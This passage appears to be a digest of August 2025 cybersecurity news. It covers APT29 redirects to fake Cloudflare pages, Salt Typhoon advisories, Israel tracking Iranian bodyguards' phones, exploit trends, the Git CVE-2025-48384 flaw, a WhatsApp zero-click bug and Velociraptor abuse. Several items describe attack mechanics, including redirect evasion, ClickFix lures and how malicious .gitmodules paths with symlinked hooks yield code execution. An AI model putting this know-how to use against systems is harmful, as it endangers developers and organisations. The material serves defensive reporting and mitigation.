it created for APT29 infrastructure, which led to the discovery of the actor-controlled domain names. Through further investigation, Amazon identified the actor compromised various legitimate websites and injected JavaScript that redirected approximately 10% of visitors to these actor-controlled domains. These domains, including findcloudflare[.]com, mimicked Cloudflare verification pages to appear legitimate. The campaign’s ultimate target was Microsoft’s device code authentication flow. There was no compromise of AWS systems, nor was there a direct impact observed on AWS services or infrastructure. Analysis of the code revealed evasion techniques, including: Using randomization to only redirect a small percentage of visitors Employing base64 encoding to hide malicious code Setting cookies to prevent repeated redirects of the same visitor Pivoting to new infrastructure when blocked Image of compromised page, with domain name removed. Image of compromised page, with domain name removed. Amazon’s disruption efforts Amazon remains committed to protecting the security of the internet by actively hunting for and disrupting sophisticated threat actors. We will continue working with industry partners and the security community to share intelligence and mitigate threats. Upon discovering this campaign, Amazon worked quickly to isolate affected EC2 instances, partner with Cloudflare and other providers to disrupt the actor’s domains, and share relevant information with Microsoft. Despite the actor’s attempts to migrate to new infrastructure, including a move off AWS to another cloud provider, our team continued tracking and disrupting their operations. After our intervention, we observed the actor register additional domains such as cloudflare[.]redirectpartners[.]com, which again attempted to lure victims into Microsoft device code authentication workflows. Protecting users and organizations We recommend organizations implement the following protective measures: For end users: Be vigilant for suspicious redirect chains, particularly those masquerading as security verification pages. Always verify the authenticity of device authorization requests before approving them. Enable multi-factor authentication (MFA) on all accounts, similar to how AWS now requires MFA for root accounts. Be wary of web pages asking you to copy and paste commands or perform actions in Windows Run dialog (Win+R). This matches the recently documented “ClickFix” technique where attackers trick users into running malicious commands. For IT administrators: Follow Microsoft’s security guidance on device authentication flows and consider disabling this feature if not required. Enforce conditional access policies that restrict authentication based on device compliance, location, and risk factors. Implement robust logging and monitoring for authentication events, particularly those involving new device authorizations. Indicators of compromise (IOCs) findcloudflare[.]com cloudflare[.]redirectpartners[.]com Sample JavaScript code Decoded JavaScript code, with compromised site removed: "[removed_domain]" Decoded JavaScript code, with compromised site removed: “[removed_domain]” hole campaign using compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices […]
UK and allies expose China-based technology companies for enabling global cyber campaign against critical networks
ncsc.gov.uk The NCSC and international partners share technical details of malicious activities and urge organisations to take mitigative actions. GCHQ’s National Cyber Security Centre and international partners link three China-based companies to campaign targeting foreign governments and critical networks. Commercial cyber ecosystem with links to the Chinese intelligence services has enabled global malicious activity. New advisory supports UK organisations in critical sectors bolster their security against China state-sponsored cyber activity Network defenders urged to proactively hunt for activity and take steps to mitigate threat from attackers exploiting avoidable weaknesses The UK and international allies have today (Wednesday) publicly linked three technology companies based in China with a global malicious cyber campaign targeting critical networks. In a new advisory published today, the National Cyber Security Centre (NCSC) – a part of GCHQ - and international partners from twelve other countries have shared technical details about how malicious cyber activities linked with these China-based commercial entities have targeted nationally significant organisations around the world. Since at least 2021, this activity has targeted organisations in critical sectors including government, telecommunications, transportation, lodging, and military infrastructure globally, with a cluster of activity observed in the UK. The activities described in the advisory partially overlaps with campaigns previously reported by the cyber security industry most commonly under the name Salt Typhoon. The data stolen through this activity can ultimately provide the Chinese intelligence services the capability to identify and track targets’ communications and movements worldwide. The advisory describes how the threat actors have had considerable success taking advantage of known common vulnerabilities rather than relying on bespoke malware or zero-day vulnerabilities to carry out their activities, meaning attacks via these vectors could have been avoided with timely patching. Organisations of national significance in the UK are encouraged to proactively hunt for malicious activity and implement mitigative actions, including ensuring that edge devices are not exposed to known vulnerabilities and implementing security updates. NCSC Chief Executive Dr Richard Horne said: “We are deeply concerned by the irresponsible behaviour of the named commercial entities based in China that has enabled an unrestrained campaign of malicious cyber activities on a global scale. “It is crucial organisations in targeted critical sectors heed this international warning about the threat posed by cyber actors who have been exploiting publicly known – and so therefore fixable – vulnerabilities. “In the face of sophisticated threats, network defenders must proactively hunt for malicious activity, as well as apply recommended mitigations based on indicators of compromise and regularly reviewing network device logs for signs of unusual activity.” The UK has led globally in helping to improve cyber risk management with leading legislation including the Telecommunications (Security) Act 2021 and the associated Code of Practice, for which the NCSC was the technical authority. The government's forthcoming Cyber Security and Resilience Bill will further strengthen the UK’s cyber defences, protecting the services the public rely on to go about their normal lives. The NCSC and government partners have previously warned about the growing range of cyber threats facing critical sectors and provides a range of guidance and resources to improve resilience. The NCSC's Early Warning service provides timely notifications about potential security issues, including known vulnerabilities, and malicious activities affecting users’ networks. All UK organisations can sign up to this free service. The three China-based technology companies provide cyber-related services to the Chinese intelligence services and are part of a wider commercial ecosystem in China, which includes information security companies, data brokers and hackers for hire. The named entities are: Sichuan Juxinhe Network Technology Co Ltd, Beijing Huanyu Tianqiong Information Technology Co, and Sichuan Zhixin Ruijie Network Technology Co Ltd. The NCSC has co-sealed this advisory alongside agencies from the United States, Australia, Canada, New Zealand, Czech Republic, Finland, Germany, Italy, Japan, the Netherlands, Poland and Spain.
Targeting Iran’s Leaders, Israel Found a Weak Link: Their Bodyguards
nytimes.com By Farnaz FassihiRonen Bergman and Mark Mazzetti 2025/08/30 Israel was able to track the movements of key Iranian figures and assassinate them during the 12-day war this spring by following the cellphones carried by members of their security forces. The meeting was so secret that only the attendees, a handful of top Iranian government officials and military commanders, knew the time and location. It was June 16, the fourth day of Iran’s war with Israel, and Iran’s Supreme National Security Council gathered for an emergency meeting in a bunker 100 feet below a mountain slope in the western part of Tehran. For days, a relentless Israeli bombing campaign had destroyed military, government and nuclear sites around Iran, and had decimated the top echelon of Iran’s military commanders and nuclear scientists. The officials, who included President Masoud Pezeshkian, the heads of the judiciary and the intelligence ministry and senior military commanders, arrived in separate cars. None of them carried mobile phones, knowing that Israeli intelligence could track them. Despite all the precautions, Israeli jets dropped six bombs on top of the bunker soon after the meeting began, targeting the two entrance and exit doors. Remarkably, nobody in the bunker was killed. When the leaders later made their way out of the bunker, they found the bodies of a few guards, killed by the blasts. The attack threw Iran’s intelligence apparatus into a tailspin, and soon enough Iranian officials discovered a devastating security lapse: The Israelis had been led to the meeting by hacking the phones of bodyguards who had accompanied the Iranian leaders to the site and waited outside. Israel’s tracking of the guards has not been previously reported. It was one part of a larger effort to penetrate the most tightly guarded circles of Iran’s security and intelligence apparatus that has had officials in Tehran chasing shadows for two months. According to Iranian and Israeli officials, Iranian security guards’ careless use of mobile phones over several years — including posting on social media — played a central role in allowing Israeli military intelligence to hunt Iranian nuclear scientists and military commanders and the Israeli Air Force to swoop in and kill them with missiles and bombs during the first week of the June war. “We know senior officials and commanders did not carry phones, but their interlocutors, security guards and drivers had phones; they did not take precautions seriously, and this is how most of them were traced,” said Sasan Karimi, who previously served as the deputy vice president for strategy in Iran’s current government and is now a political analyst and lecturer at Tehran University. The account of Israel’s strike on the meeting, and the details of how it tracked and targeted Iranian officials and commanders, is based on interviews with five senior Iranian officials, two members of the Islamic Revolutionary Guards Corps and nine Israeli military and intelligence officials. The security breakdowns with the bodyguards are just one component of what Iranian officials acknowledge has been a long-running and often successful effort by Israel to use spies and operatives placed around the country as well as technology against Iran, sometimes with devastating effect. Want to stay updated on what’s happening in Iran and Israel? , and we’ll send our latest coverage to your inbox. Following the most recent conflict, Iran remains focused on hunting down operatives that it fears remain present in the country and the government. “Infiltration has reached the highest echelons of our decision making,” Mostafa Hashemi Taba, a former vice president and minister, said in an interview with Iranian media in late June. This month Iran executed a nuclear scientist, Roozbeh Vadi, on allegations of spying for Israel and facilitating the assassination of another scientist. Three senior Iranian officials and a member of the Revolutionary Guards said Iran had quietly arrested or placed under house arrest dozens of people from the military, intelligence and government branches who were suspected of spying for Israel, some of them high-ranking. Israel has neither confirmed nor denied a connection to those so accused. Spy games between Iran and Israel have been a constant feature of a decades-long shadow war between the two countries, and Israel’s success in June in killing so many important Iranian security figures shows just how much Israel has gained the upper hand. President Masoud Pezeshkian of Iran attending a protest in Tehran on June 22, following the U.S. attacks on nuclear sites in Iran. Mr. Pezeshkian himself escaped an attack on a bunker on June 16. Credit... Arash Khamooshi for The New York Times Israel had been tracking senior Iranian nuclear scientists since the end of 2022 and had weighed killing them as early as last October but held off to avoid a clash with the Biden administration, Israeli officials said. From the end of last year until June, what the Israelis called a “decapitation team” reviewed the files of all the scientists in the Iranian nuclear project known to Israel, to decide which they would recommend to kill. The first list contained 400 names. That was reduced to 100, mainly based on material from an Iranian nuclear archive that the Mossad, the Israeli intelligence agency, had stolen from Iran in 2018. In the end, Iran said the Israelis focused on and killed 13 scientists. At the same time, Israel was building its capacity to target and kill senior Iranian military officials under a program called “Operation Red Wedding,” a play on a bloody “Game of Thrones” episode. Brig. Gen. Amir Ali Hajizadeh, the commander of the Revolutionary Guards’ Aerospace Force, was the first target, one Israeli official said. Ultimately, Israeli officials said, the basic idea in both operations was to locate 20 to 25 human targets in Iran and hit all of them in the opening strike of the campaign, on the assumption that they would be more careful afterward, making them much harder to hit. In a video interview with an Iranian journalist, the newly appointed head of the Revolutionary Guards Corps, Brig. Gen. Ahmad Vahidi, said that although Israel had human operatives and spies in the country, it had tracked senior officials and scientists and discovered the location of sensitive meetings mostly through advanced technology. “The enemy gets the majority of its intelligence through technology, satellites and electronic data,” General Vahidi said. “They can find people, get information, their voices, images and zoom in with precise satellites and find the locations.” From the Israeli side, Iran’s growing awareness of the threat to senior figures came to be seen as an opportunity. Fearing more assassinations on the ground of the sort that Israel had pulled off successfully in the past, the supreme Iranian leader, Ayatollah Ali Khamenei, ordered extensive security measures including large contingents of bodyguards and warned against the use of mobile phones and messaging apps like WhatsApp, which is commonly used in Iran. Those bodyguards, Israel discovered, were not only carrying cellphones but even posting from them on social media. “Using so many bodyguards is a weakness that we imposed on them, and we were able to take advantage of that,” one Israeli defense official said. Iranian officials had long suspected that Israel was tracking the movements of senior military commanders and nuclear scientists through their mobile phones. Last year, after Israel detonated bombs hidden inside thousands of pagers carried by Hezbollah operatives in Lebanon, Iran banned many of its officials in particularly sensitive jobs from using smartphones, social media and messaging apps. Smartphones are now completely off limits for senior military commanders, nuclear scientists and government officials. The protection of senior officials, military commanders and nuclear scientists is the responsibility of an elite brigade within the Revolutionary Guards called Ansar al-Mehdi. The commander in chief of Ansar, appointed last August after the new government came into office, is Gen. Mohamad Javad Assadi, one of the youngest senior commanders in the Guards. General Assadi had personally warned several senior commanders and a top nuclear scientist, Mohammad Mehdi Tehranchi, that Israel was planning to assassinate them at least a month before they were killed on the first day of the war, according to two senior Iranian officials with knowledge of the conversation. He had also called a meeting with the team leaders of security details asking them to take extra precautions, the officials said. The cellphone ban initially did not extend to the security guards protecting the officials, scientists and commanders. That changed after Israel’s wave of assassinations on the first day of the war. Guards are now supposed to carry only walkie-talkies. Only team leaders who do not travel with the officials can carry cellphones. But despite the new rules, according to officials who have held meetings with General Assadi about security, someone violated them and carried a phone to the National Security Council meeting, allowing the Israelis to carry out the pinpoint strike. Hamzeh Safavi, a political and military analyst whose father is the top military adviser to Ayatollah Khamenei, said that Israel’s technological superiority over Iran was an existential threat. He said Iran had no choice but to conduct a security shakedown, overhaul its protocols and make difficult decisions — including arrests and prosecution of high-level spies. “We must do whatever it takes to identify and address this threat; we have a major security and intelligence bug and nothing is more urgent than repairing this hole,” Mr. Safavi said in a telephone interview. Iran’s minister of intelligence said in a statement this month that it had foiled an Israeli assassination attempt on 23 senior officials...
State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine
infosecurity-magazine James Coker Deputy Editor, Infosecurity Magazine 29 Aug 2025 Recorded Future highlighted the vast capabilities of state actors to rapidly weaponize newly disclosed vulnerabilities for geopolitical purposes The majority (53%) of attributed vulnerability exploits in the first half 2025 were conducted by state-sponsored actors for strategic, geopolitical purposes, according to a new report by Recorded Future’s Insikt Group. The researchers said the findings demonstrate the growing ability of well-resourced state-sponsored groups to weaponize flaws rapidly following disclosure. Geopolitical purposes, such as espionage and surveillance, are the key motives for these threat actors. “The significant state-sponsored involvement also implies that these threats are not just random or opportunistic but often targeted and persistent campaigns aiming at specific sectors or high-value systems,” they noted. The majority of state-sponsored campaigns were conducted by Chinese state-sponsored actors. These groups primarily targeted edge infrastructure and enterprise solutions, a tactic that has continued since 2024. Read now: Chinese Tech Firms Linked to Salt Typhoon Espionage Campaigns The suspected China-linked group UNC5221 exploited the highest number of vulnerabilities in H1 2025. It demonstrated a preference for Ivanti products, including Endpoint Manager Mobile, Connect Secure and Policy Secure. Financially motivated groups accounted for the remaining 47% of vulnerability exploits – 27% were made up of those actors involved in theft and fraud but not linked to ransomware and 20% attributed to ransomware and extortion groups. The researchers predicted that the exploitation of edge security appliances, remote access tools and other gateway-layer software will remain a top priority for both state-sponsored and financially-motivated groups. “The strategic value of these systems – acting as intermediaries for encrypted traffic and privileged access – makes them high-reward targets,” they noted. Microsoft was the most targeted vendor, with the tech giant’s products accounting for 17% of exploitations. Most Vulnerability Exploits Required No Authentication Insikt Group’s H1 2025 Malware and Vulnerability Trends report, published on August 28, found that the total number of disclosed common vulnerabilities and exposures (CVEs) grew 16% year-over-year. Attackers exploited 161 distinct vulnerabilities in the six-month period, up from 136 in H1 2024. Of the 161 flaws, 69% required no authentication to exploit, while 48% could be exploited remotely over a network. “This heavy tilt toward unauthenticated, remote exploits means that attacks can be launched directly from the internet against vulnerable hosts, with no credentials or insider access needed,” the researchers commented. Additionally, 30% of the exploited CVEs enabled remote code execution (RCE), which often grants an attacker full control over the target system. ClickFix Becomes a Favored Initial Access Technique The report observed that ransomware actors adopted new initial access techniques in H1 2025. This included a significant increase in ClickFix social engineering attacks. ClickFix involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it. The tactic preys on users’ desire to fix problems themselves rather than alerting their IT team or anyone else. Therefore, it is effective at bypassing security protections as the victim infects themselves. The Interlock gang was observed using ClickFix in campaigns in January and February 2025. The group has also leveraged FileFix in later attacks. This tactic is an evolution on ClickFix, where users are tricked into pasting a malicious file path into a Windows File Explorer’s address bar rather than using a dialog box. Inskit group assess that the success of ClickFix means this method will remain a favored initial access technique through the rest of 2025 unless widespread mitigations reduce its effectiveness. Post-compromise, ransomware groups have increased their use of endpoint detection and response (EDR) evasion via bring-your-own-installer (BYOI) techniques, and custom payloads using just-in-time (JIT) hooking and memory injection to bypass detection.
Chinese hack group targets Dutch internet providers, intelligence agencies confirm | NL Times
nltimes.nl/ Thursday, 28 August 2025 - 12:50 - Dutch intelligence agencies confirmed on Thursday that the country was targeted in the global cyberespionage campaign carried out by the Chinese state-linked hacker group Salt Typhoon. The campaign, which came to light in late 2024, focused on the international telecommunications sector. The Dutch Military Intelligence and Security Service (MIVD) and the General Intelligence and Security Service (AIVD) said they independently verified portions of a U.S. investigation attributing the campaign to Salt Typhoon. “We can confirm parts of the U.S. findings through our own intelligence,” the agencies stated. The warning aligns with alerts issued by the U.S. National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI), as well as European intelligence services including Germany’s BND, Finland’s SUPO, the U.K.’s NCSC, and Italy’s AISE. In the Netherlands, the targets were smaller Internet service and hosting providers rather than the major telecom operators. Investigations by the MIVD and AIVD indicate that the hackers gained access to routers of Dutch targets but, as far as is known, did not penetrate internal networks further. Where possible, the agencies and the National Cyber Security Centre (NCSC) shared threat information with affected organizations. The agencies emphasized that China’s cyber activities have become increasingly sophisticated. “These activities are now so advanced that continuous effort and attention are needed to detect and counter cyber operations against Dutch interests,” the MIVD and AIVD said. They added that while proactive measures can reduce risk, complete prevention is not possible, posing a significant challenge to national cyber resilience
www.root.io Root Security Bulletin - CVE: CVE-2025-48384 Date: August 26, 2025 Severity: High (CVSS v3.1 Score: 8.0) Overview A critical Git vulnerability, CVE-2025-48384, has been identified and is actively exploited in the wild, now listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. This flaw enables remote code execution (RCE) through malicious repositories and poses a significant risk to developers and CI/CD pipelines across Linux and macOS systems. Windows installations are unaffected due to filesystem restrictions. The vulnerability impacts all Git versions prior to the patched releases issued on July 8, 2025. While Ubuntu responded immediately with security advisories, Debian has marked the issue "no-dsa," delaying fixes until future point releases—leaving many Debian-based environments exposed. Technical Details The vulnerability arises from an inconsistency in Git's configuration parsing logic: When reading config values, Git strips trailing CRLF characters. When writing, values with trailing carriage returns (CR) are not properly quoted, leading to discrepancies when read back. Attackers can exploit this by creating malicious .gitmodules files with submodule paths ending in CR characters. When combined with symlinked hooks directories and executable post-checkout hooks, this enables arbitrary file writes and ultimately remote code execution. Exploitation scenario: Victims running git clone --recursive on a malicious repository may initialize submodules in unintended filesystem locations. Security researchers (liamg, acheong08, and others) have published proof-of-concept exploits validating the attack's real-world impact. Affected versions: Git versions prior to v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1 Systems: Linux, macOS (where control characters are allowed in filenames) Not affected: Windows CVSS v3.1 Vector: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H Base Score: 8.0 (High) Impact Active exploitation confirmed: CISA added CVE-2025-48384 to its KEV catalog on August 25, 2025, with a remediation deadline of September 15, 2025 for U.S. federal agencies. Developer tools at risk: GitHub Desktop for macOS is particularly vulnerable due to its default use of recursive cloning. Distribution disparity: Ubuntu issued immediate advisories and patches, while Debian deferred remediation, leaving production systems running Bookworm, Bullseye, or Trixie without timely fixes. This uneven patching cadence underscores the supply chain risks when critical open-source infrastructure receives inconsistent remediation across ecosystems. Timeline July 8, 2025: Git project discloses CVE-2025-48384 and issues patched releases across eight version branches. July 9-15, 2025: Security researchers publish multiple proof-of-concept exploits, confirming real-world exploitability. August 8, 2025: Root tested, backported, and deployed patches for Debian Bookworm, Bullseye, Trixie, and all Slim variants, delivering them seamlessly across all Root users' environments without disruption. August 15, 2025: Debian marked the issue as "no-dsa," opting for remediation only in future point releases. August 25, 2025: CISA added CVE-2025-48384 to the KEV catalog, mandating U.S. federal agencies remediate by September 15. Recommendations For Debian Users Confirm exposure: Determine if your systems use the git package maintained by Debian. Tools like Trivy or enterprise vulnerability scanners can quickly verify vulnerable versions. Short-term mitigations: Avoid git clone --recursive on untrusted repositories. Inspect .gitmodules files before initializing submodules. Consider compiling patched versions of Git from source where feasible. For Root Users Customers using Root's Agentic Vulnerability Remediation (AVR) platform are already protected. Root delivered patched and backported Git packages on August 8, 2025, covering Debian Bookworm, Bullseye, Trixie, and all Slim variants. Patches were deployed seamlessly across all user environments without disruption. Users can verify their protection in the Artifact Explorer or trigger an on-demand remediation in under five minutes. Extended availability: Root's patched versions are also accessible through partners such as Aikido and scanners using Trivy, where advanced tier subscribers receive immediate coverage. For Non-Customers Get free remediation: Sign up at app.root.io to remediate affected images and push them back to your repositories at no cost. Root's Approach Root’s Agentic Vulnerability Remediation (AVR) technology leverages AI-driven automation overseen by security experts, replicating the decision-making of seasoned engineers at scale. The platform operates in five phases: Assessment – Mapping CVEs across known databases. Recommendation – Identifying the optimal remediation path. Application – Applying and backporting security patches where needed. Validation – Rigorous testing against public frameworks. Deployment – Delivering fully remediated, auditable images. Unlike traditional vulnerability scanners, Root fixes vulnerabilities proactively—eliminating false positives, providing comprehensive SBOMs and VEX statements, and reducing remediation time to minutes. Conclusion CVE-2025-48384 highlights both the responsiveness of the Git project and the uneven patching practices across Linux distributions. While upstream patches were released promptly, Debian's deferred remediation created a critical exposure window that attackers are already exploiting. Organizations relying on Debian-based containers cannot afford to wait for delayed point releases. Automated remediation platforms like Root AVR bridge this gap by providing continuous, proactive protection at container-build speeds—ensuring development teams remain secure without sacrificing velocity. For broader industry analysis of what this vulnerability reveals about modern security approaches, see our blog post: CVE- 2025-48384: The Git Vulnerability That's Exposing a Broken System. Take action now: Explore Root's remediation for CVE-2025-48384 at app.root.io
WhatsApp fixes 'zero-click' bug used to hack Apple users with spyware | TechCrunch
techcrunch.com Zack Whittaker 11:15 AM PDT · August 29, 2025 A spyware vendor was behind a recent campaign that abused a vulnerability in WhatsApp to deliver an exploit capable of hacking into iPhones and Macs. WhatsApp said on Friday that it fixed a security bug in its iOS and Mac apps that was being used to stealthily hack into the Apple devices of “specific targeted users.” The Meta-owned messaging app giant said in its security advisory that it fixed the vulnerability, known officially as CVE-2025-55177, which was used alongside a separate flaw found in iOS and Macs, which Apple fixed last week and tracks as CVE-2025-43300. Apple said at the time that the flaw was used in an “extremely sophisticated attack against specific targeted individuals.” Now we know that dozens of WhatsApp users were targeted with this pair of flaws. Donncha Ó Cearbhaill, who heads Amnesty International’s Security Lab, described the attack in a post on X as an “advanced spyware campaign” that targeted users over the past 90 days, or since the end of May. Ó Cearbhaill described the pair of bugs as a “zero-click” attack, meaning it does not require any interaction from the victim, such as clicking a link, to compromise their device. The two bugs chained together allow an attacker to deliver a malicious exploit through WhatsApp that’s capable of stealing data from the user’s Apple device. Per Ó Cearbhaill, who posted a copy of the threat notification that WhatsApp sent to affected users, the attack was able to “compromise your device and the data it contains, including messages.” It’s not immediately clear who, or which spyware vendor, is behind the attacks. When reached by TechCrunch, Meta spokesperson Margarita Franklin confirmed the company detected and patched the flaw “a few weeks ago” and that the company sent “less than 200” notifications to affected WhatsApp users. The spokesperson did not say, when asked, if WhatsApp has evidence to attribute the hacks to a specific attacker or surveillance vendor. This is not the first time that WhatsApp users have been targeted by government spyware, a kind of malware capable of breaking into fully patched devices with vulnerabilities not known to the vendor, known as zero-day flaws. In May, a U.S. court ordered spyware maker NSO Group to pay WhatsApp $167 million in damages for a 2019 hacking campaign that broke into the devices of more than 1,400 WhatsApp users with an exploit capable of planting NSO’s Pegasus spyware. WhatsApp brought the legal case against NSO, citing a breach of federal and state hacking laws, as well as its own terms of service. Earlier this year, WhatsApp disrupted a spyware campaign that targeted around 90 users, including journalists and members of civil society across Italy. The Italian government denied its involvement in the spying campaign. Paragon, whose spyware was used in the campaign, later cut off Italy from its hacking tools for failing to investigate the abuse.
Insurers May Limit Payments in Cases of Unpatched CVEs
darkreading.com Robert Lemos, Contributing Writer August 22, 2025 Some insurers look to limit payouts to companies that don't remediate serious vulnerabilities in a timely manner. Unsurprisingly, most companies don't like those restrictions. Cyber insurers are testing out new ways to hold policyholders accountable for outdated security, limiting payouts when policyholders fall prey to attacks that use older vulnerabilities or take advantage of holes in the organizations' defenses. Potential risk-limiting approaches include a sliding scale of accountability — and payouts — based on an unpatched vulnerability's half-life, or whether a company failed to fix a critical vulnerability within a certain number of days, according to a blog post penned by cyber insurer Coalition, which does not support such approaches. Dubbed CVE exclusions, after the Common Vulnerabilities and Exposures (CVE) system widely used to assign identifiers to software security issues, the tactic is not yet widely adopted, and most examples are from insurers outside the US, the firm stated. The limits could start showing up in companies' policies, however, if demand for cyber insurance continues to grow, creating a seller's market, says John Coletti, head of cyber underwriting at Coalition "While we will not name names, there are specific examples of this occurring within the industry," he says. "A company should be highly skeptical of buying a policy with a CVE exclusion." Cyber-insurance firms are struggling to find different ways to limit their vulnerability to large breaches and campaigns that hit a large number of policyholders. Following NotPetya, when companies used business insurance to cover disruptions to operations, efforts to deny payouts based on warlike-act exclusion clauses largely failed but led to enhanced wording in subsequent policies. Increasingly, cyber-insurance firms used data from policyholders or gleaned from cybersecurity assessments, or information from their own managed security services offerings to better determine risk. Blame the Victim? Yet requiring all companies to manage major vulnerabilities is a tall order. Currently, the software industry is on track to disclose more than 46,000 vulnerabilities in 2025, up from nearly 40,000 in 2024, according to the National Vulnerability Database (NVD). Of those, likely 30% would be considered of high or critical severity, typically defined as a Common Vulnerability Scoring System (CVSS) score of 8.0 or higher.
Google previews cyber ‘disruption unit’ as U.S. government, industry weigh going heavier on offense | CyberScoop
cyberscoop.com article By Tim Starks August 27, 2025 Google says it is starting a cyber “disruption unit,” a development that arrives in a potentially shifting U.S. landscape toward more offensive-oriented approaches in cyberspace. But the contours of that larger shift are still unclear, and whether or to what extent it’s even possible. While there’s some momentum in policymaking and industry circles to put a greater emphasis on more aggressive strategies and tactics to respond to cyberattacks, there are also major barriers. Sandra Joyce, vice president of Google Threat Intelligence Group, said at a conference Tuesday that more details of the disruption unit would be forthcoming in future months, but the company was looking for “legal and ethical disruption” options as part of the unit’s work. “What we’re doing in the Google Threat Intelligence Group is intelligence-led proactive identification of opportunities where we can actually take down some type of campaign or operation,” she said at the Center for Cybersecurity Policy and Law event, where she called for partners in the project. “We have to get from a reactive position to a proactive one … if we’re going to make a difference right now.” The boundaries in the cyber domain between actions considered “cyber offense” and those meant to deter cyberattacks are often unclear. The tradeoff between “active defense” vs. “hacking back” is a common dividing line. On the less aggressive end, “active defense” can include tactics like setting up honeypots designed to lure and trick attackers. At the more extreme end, “hacking back” would typically involve actions that attempt to deliberately destroy an attacker’s systems or networks. Disruption operations might fall between the two, like Microsoft taking down botnet infrastructure in court or the Justice Department seizing stolen cryptocurrency from hackers. Trump administration officials and some in Congress have been advocating for the U.S. government to go on offense in cyberspace, saying that foreign hackers and criminals aren’t suffering sufficient consequences. Much-criticized legislation to authorize private sector “hacking back” has long stalled in Congress, but some have recently pushed a version of the idea where the president would give “letters of marque” like those for early-U.S. sea privateers to companies authorizing them to legally conduct offensive cyber operations currently forbidden under U.S. law. The private sector has some catching up to do if there’s to be a worthy field of firms able to focus on offense, experts say. John Keefe, a former National Security Council official from 2022 to 2024 and National Security Agency official before that, said there had been government talks about a “narrow” letters of marque approach “with the private sector companies that we thought had the capabilities.” The concept was centered on ransomware, Russia and rules of the road for those companies to operate. “It wasn’t going to be the Wild West,” said Keefe, now founder of Ex Astris Scientia, speaking like others in this story at Tuesday’s conference. The companies with an emphasis on offense largely have only one customer — and that’s governments, said Joe McCaffrey, chief information security officer at defense tech company Anduril Industries. “It’s a really tough business to be in,” he said. “If you develop an exploit, you get to sell to one person legally, and then it gets burned, and you’re back again.” By their nature, offensive cyber operations in the federal government are already very time- and manpower-intensive, said Brandon Wales, a former top official at the Cybersecurity and Infrastructure Security Agency and now vice president of cybersecurity at SentinelOne. Private sector companies could make their mark by innovating ways to speed up and expand the number of those operations, he said. Overall, among the options of companies that could do more offensive work, the “industry doesn’t exist yet, but I think it’s coming,” said Andrew McClure, managing director at Forgepoint Capital. Certainly Congress would have to clarify what companies are able to do legally as well, Wales said. But that’s just the industry side. There’s plenty more to weigh when stepping up offense. “However we start, we need to make sure that we are having the ability to measure impact,” said Megan Stifel, chief strategy officer for the Institute for Security and Technology. “Is this working? How do we know?” If there was a consensus at the conference it’s that the United States — be it the government or private sector — needs to do more to deter adversaries in cyberspace by going after them more in cyberspace. One knock on that idea has been that the United States can least afford to get into a cyber shooting match, since it’s more reliant on tech than other nations and an escalation would hurt the U.S. the most by presenting more vulnerable targets for enemies. But Dmitri Alperovitch, chairman of the Silverado Policy Accelerator, said that idea was wrong for a couple reasons, among them that other nations have become just as reliant on tech, too. And “the very idea that in this current bleak state of affairs, engaging in cyber offense is escalatory, I propose to you, is laughable,” he said. “After all, what are our adversaries going to escalate to in response? Ransom more of our hospitals, penetrate more of our water and electric utilities, steal even more of our IP and financial assets?” Alperovitch continued: “Not only is engaging in thoughtful and careful cyber offense not escalatory, but not doing so is.”
Velociraptor incident response tool abused for remote access
news.sophos.com Written by Sophos Counter Threat Unit Research Team August 26, 2025 This approach represents an evolution from threat actors abusing remote monitoring and management tools In August 2025, Counter Threat Unit™ (CTU) researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool. In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server. Enabling the tunnel option in Visual Studio Code triggered a Taegis™ alert, as this option can allow both remote access and remote code execution and has been abused by multiple threat groups in the past. The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool. This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder (see Figure 1). Velociraptor creating Visual Studio Code tunnel Figure 1: Process tree showing Velociraptor creating Visual Studio Code tunnel. The Visual Studio Code tunneling activity triggered a Taegis alert that prompted a Sophos investigation. The analysts provided mitigation advice that enabled the customer to quickly implement remediations such as isolating the affected host, which prevented the attacker from achieving their objectives. Analysis suggests that the malicious activity would likely have led to ransomware deployment. Threat actors often abuse remote monitoring and management (RMM) tools. In some instances, they leverage preexisting tools on the targeted systems. In others, they deploy the tools during the attack. The Velociraptor incident reveals attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy. Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat. The impact of an attack is greatly reduced if it is caught prior to ransomware deployment. The following Sophos protections detect activity related to this threat: Troj/Agent-BLMR Troj/BatDl-PL Troj/Mdrop-KDK To mitigate exposure to this malware, CTU™ researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. The domains may contain malicious content, so consider the risks before opening them in a browser. Indicator Type Context files[.]qaubctgg[.]workers[.]dev Domain name Hosted tools used in August 2025 Velociraptor campaign velo[.]qaubctgg[.]workers[.]dev Domain name C2 server used in August 2025 Velociraptor campaign Table 1: Indicators for this threat.
